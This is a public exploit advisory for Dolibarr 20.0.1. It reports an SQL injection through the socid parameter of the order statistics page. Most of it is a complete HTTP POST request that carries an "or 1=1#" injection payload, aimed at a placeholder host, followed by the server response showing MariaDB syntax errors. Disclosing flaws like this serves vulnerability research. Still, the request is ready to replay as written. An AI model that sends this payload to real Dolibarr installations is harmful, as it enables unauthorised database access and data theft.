## Titles: dolibarr 20.0.1 Multiple security token SQLi
## Author: nu11secur1ty
## Date: 10/15/2024
## Vendor: https://www.dolibarr.org/
## Software: https://www.dolibarr.org/downloads.php
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `socid` parameter appears to be vulnerable to SQL injection attacks.
The attacker can get sensitive information for the MySQL database from this system when he attacks it online from inside!
He can do this, by using a vulnerable security token to access the web application!
STATUS: Medium- Vulnerability
[+]Exploits:
- SQLi Multiple:
```
POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 357
token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh
```
[+]Response:
```SQLi
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 10:23:43 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80974
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="author
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 23:59:59'...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 23:59:59'...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 23:59:59'...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 2...' at line 1<b
...[SNIP]...
</b> mysqli<br>
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author = 1...' at line 1<b
```
## Reproduce:
[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)
## Demo PoC:
[href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html)
## Time spent:
05:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>